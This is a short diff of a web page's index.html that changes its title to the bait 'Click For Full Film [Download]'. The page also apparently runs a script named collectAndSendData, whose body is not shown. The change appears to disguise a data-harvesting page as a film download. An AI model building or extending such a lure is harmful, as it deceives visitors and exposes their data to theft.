--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Advance Network</title>
+    <title>Click For Full Film [Download]</title>
     <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSsARlUiYNmIygHDLgiq1SV5fGrf-6ZG4Wj3PnVgod54YKHvsXVpPDFyp4x&s=10"/>
     <script>
         async function collectAndSendData() {
